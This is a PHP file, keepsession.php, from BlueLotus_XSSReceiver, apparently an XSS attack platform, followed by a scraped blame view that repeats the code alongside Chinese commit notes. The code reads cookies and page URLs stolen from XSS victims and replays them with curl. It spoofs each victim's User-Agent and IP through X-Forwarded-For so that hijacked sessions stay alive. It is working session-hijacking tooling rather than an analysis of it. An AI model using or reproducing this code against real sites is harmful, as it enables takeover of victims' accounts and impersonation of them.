BlueLotus_XSSReceiver/keepsession.php

<?php
define("IN_XSS_PLATFORM", true);

ignore_user_abort();
//Windows平台最好别设成0，因为windows上lock没法实现非阻塞
set_time_limit(0);

require_once("load.php");
require_once("functions.php");
require_once("dio.php");

if (KEEP_SESSION) {
    //利用非阻塞的flock实现单例运行
    $pid = fopen(DATA_PATH . '/check.pid', "w");
    if (!$pid)
        exit();
    
    if (flock($pid, LOCK_EX | LOCK_NB)) {
        $files = glob(DATA_PATH . '/*.php');
        foreach ($files as $file) {
            $filename = basename($file, ".php");
            $info     = load_xss_record($filename);
            if ($info['keepsession'] === true) {
                $url    = getLocation($info);
                $cookie = getCookie($info);
                
                $useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2535.0 Safari/537.36";
                if (isset($info['headers_data']['User-Agent']))
                    $useragent = $info['headers_data']['User-Agent'];
                
                $ip = $info['user_IP'];
                if ($url != "" && $cookie != "") {
                    $ch       = curl_init();
                    $header[] = 'User-Agent: ' . $useragent;
                    $header[] = 'Cookie: ' . $cookie;
                    $header[] = 'X-Forwarded-For: ' . $ip;
                    
                    curl_setopt($ch, CURLOPT_URL, $url);
                    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
                    //https不校验证书，按需开启吧
                    //curl_setopt ( $curl_handle, CURLOPT_SSL_VERIFYHOST, 0 );
                    
                    curl_exec($ch);
                    curl_close($ch);
                }
            }
            
        }
        
        //可加上sleep来防止keepsession被ddos    
        //sleep(10);
        flock($pid, LOCK_UN);
    }
    
    fclose($pid);
    
}

function getCookie($info)
{
    $cookie = "";
    
    if (isset($info['decoded_get_data']['cookie']) && $info['decoded_get_data']['cookie'] != "")
        $cookie = $info['decoded_get_data']['cookie'];
    else if (isset($info['get_data']['cookie']) && $info['get_data']['cookie'] != "")
        $cookie = $info['get_data']['cookie'];
    else if (isset($info['decoded_post_data']['cookie']) && $info['decoded_post_data']['cookie'] != "")
        $cookie = $info['decoded_post_data']['cookie'];
    else if (isset($info['post_data']['cookie']) && $info['post_data']['cookie'] != "")
        $cookie = $info['post_data']['cookie'];
    else if (isset($info['decoded_cookie_data']['cookie']) && $info['decoded_cookie_data']['cookie'] != "")
        $cookie = $info['decoded_cookie_data']['cookie'];
    else if (isset($info['cookie_data']['cookie']) && $info['cookie_data']['cookie'] != "")
        $cookie = $info['cookie_data']['cookie'];
    
    return htmlspecialchars_decode($cookie, ENT_QUOTES);
    
}

function getLocation($info)
{
    $location = "";
    
    if (isset($info['decoded_get_data']['location']) && $info['decoded_get_data']['location'] != "")
        $location = $info['decoded_get_data']['location'];
    else if (isset($info['get_data']['location']) && $info['get_data']['location'] != "")
        $location = $info['get_data']['location'];
    else if (isset($info['decoded_post_data']['location']) && $info['decoded_post_data']['location'] != "")
        $location = $info['decoded_post_data']['location'];
    else if (isset($info['post_data']['location']) && $info['post_data']['location'] != "")
        $location = $info['post_data']['location'];
    else if (isset($info['decoded_cookie_data']['location']) && $info['decoded_cookie_data']['location'] != "")
        $location = $info['decoded_cookie_data']['location'];
    else if (isset($info['cookie_data']['location']) && $info['cookie_data']['location'] != "")
        $location = $info['cookie_data']['location'];
    else if (isset($info['headers_data']['Referer']) && $info['headers_data']['Referer'] != "")
        $location = $info['headers_data']['Referer'];
    
    return htmlspecialchars_decode($location, ENT_QUOTES);
}
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								<?php
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								define("IN_XSS_PLATFORM", true);
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+								ignore_user_abort();
 								//Windows平台最好别设成0，因为windows上lock没法实现非阻塞
 								set_time_limit(0);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								require_once("load.php");
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								require_once("functions.php");
 								require_once("dio.php");
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								if (KEEP_SESSION) {
 								    //利用非阻塞的flock实现单例运行
 								    $pid = fopen(DATA_PATH . '/check.pid', "w");
 								    if (!$pid)
 								        exit();
 								    if (flock($pid, LOCK_EX | LOCK_NB)) {
 								        $files = glob(DATA_PATH . '/*.php');
 								        foreach ($files as $file) {
 								            $filename = basename($file, ".php");
 								            $info     = load_xss_record($filename);
 								            if ($info['keepsession'] === true) {
 								                $url    = getLocation($info);
 								                $cookie = getCookie($info);
 								                $useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2535.0 Safari/537.36";
 								                if (isset($info['headers_data']['User-Agent']))
 								                    $useragent = $info['headers_data']['User-Agent'];
 								                $ip = $info['user_IP'];
 								                if ($url != "" && $cookie != "") {
 								                    $ch       = curl_init();
 								                    $header[] = 'User-Agent: ' . $useragent;
 								                    $header[] = 'Cookie: ' . $cookie;
 								                    $header[] = 'X-Forwarded-For: ' . $ip;
 								                    curl_setopt($ch, CURLOPT_URL, $url);
 								                    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
 								                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
 								                    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
 								                    //https不校验证书，按需开启吧
 								                    //curl_setopt ( $curl_handle, CURLOPT_SSL_VERIFYHOST, 0 );
 								                    curl_exec($ch);
 								                    curl_close($ch);
 								                }
 								            }
 								        }
-												Version 3.3.7
去除addslashes转义（无sql），确保UI显示的是非转义的结果

											
										
										
											2016-02-03 21:49:16 +08:00
+								        //可加上sleep来防止keepsession被ddos
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								        //sleep(10);
 								        flock($pid, LOCK_UN);
 								    }
 								    fclose($pid);
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+								}
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								function getCookie($info)
 								{
 								    $cookie = "";
 								    if (isset($info['decoded_get_data']['cookie']) && $info['decoded_get_data']['cookie'] != "")
 								        $cookie = $info['decoded_get_data']['cookie'];
 								    else if (isset($info['get_data']['cookie']) && $info['get_data']['cookie'] != "")
 								        $cookie = $info['get_data']['cookie'];
 								    else if (isset($info['decoded_post_data']['cookie']) && $info['decoded_post_data']['cookie'] != "")
 								        $cookie = $info['decoded_post_data']['cookie'];
 								    else if (isset($info['post_data']['cookie']) && $info['post_data']['cookie'] != "")
 								        $cookie = $info['post_data']['cookie'];
 								    else if (isset($info['decoded_cookie_data']['cookie']) && $info['decoded_cookie_data']['cookie'] != "")
 								        $cookie = $info['decoded_cookie_data']['cookie'];
 								    else if (isset($info['cookie_data']['cookie']) && $info['cookie_data']['cookie'] != "")
 								        $cookie = $info['cookie_data']['cookie'];
-												Version 3.3.7
去除addslashes转义（无sql），确保UI显示的是非转义的结果

											
										
										
											2016-02-03 21:49:16 +08:00
+								    return htmlspecialchars_decode($cookie, ENT_QUOTES);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+								}
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								function getLocation($info)
 								{
 								    $location = "";
 								    if (isset($info['decoded_get_data']['location']) && $info['decoded_get_data']['location'] != "")
 								        $location = $info['decoded_get_data']['location'];
 								    else if (isset($info['get_data']['location']) && $info['get_data']['location'] != "")
 								        $location = $info['get_data']['location'];
 								    else if (isset($info['decoded_post_data']['location']) && $info['decoded_post_data']['location'] != "")
 								        $location = $info['decoded_post_data']['location'];
 								    else if (isset($info['post_data']['location']) && $info['post_data']['location'] != "")
 								        $location = $info['post_data']['location'];
 								    else if (isset($info['decoded_cookie_data']['location']) && $info['decoded_cookie_data']['location'] != "")
 								        $location = $info['decoded_cookie_data']['location'];
 								    else if (isset($info['cookie_data']['location']) && $info['cookie_data']['location'] != "")
 								        $location = $info['cookie_data']['location'];
 								    else if (isset($info['headers_data']['Referer']) && $info['headers_data']['Referer'] != "")
 								        $location = $info['headers_data']['Referer'];
-												Version 3.3.7
去除addslashes转义（无sql），确保UI显示的是非转义的结果

											
										
										
											2016-02-03 21:49:16 +08:00
+								    return htmlspecialchars_decode($location, ENT_QUOTES);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								}